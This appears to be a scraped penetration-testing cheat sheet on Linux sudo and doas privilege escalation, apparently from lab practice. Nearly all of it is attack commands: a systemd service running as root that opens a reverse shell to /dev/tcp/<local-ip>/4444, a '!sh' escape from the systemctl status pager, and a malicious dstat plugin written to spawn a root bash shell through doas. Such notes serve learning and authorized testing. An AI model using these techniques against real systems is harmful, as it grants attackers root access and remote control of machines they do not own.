Sudo Privilege escalation
Last updated
Last updated
Intrusionz3r0@htb[/htb]$ sudo -l
(ALL) NOPASSWD: systemctl[Unit]
This is an example service.
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<local-ip>/4444 0>&1'
[Install]
WantedBy=multi-user.target
Copied!sudo systemctl daemon-reload
sudo systemctl restart example.service
Copied!Intrusionz3r0@htb[/htb]$ sudo -l
(ALL) NOPASSWD: systemctl status example.servicesudo systemctl status example.service
!sh#Find doas configuration file
Intrusionz3r0@kali:~$ find / -name doas.conf 2>/dev/null
#Write Malcious Plugin
Intrusionz3r0@kali:~$ echo -e 'import os\n\nos.system("/bin/bash")' > /usr/local/share/dstat/dstat_Intrusionz3r0.py
#Execute
doas /usr/bin/dstat --Intrusionz3r0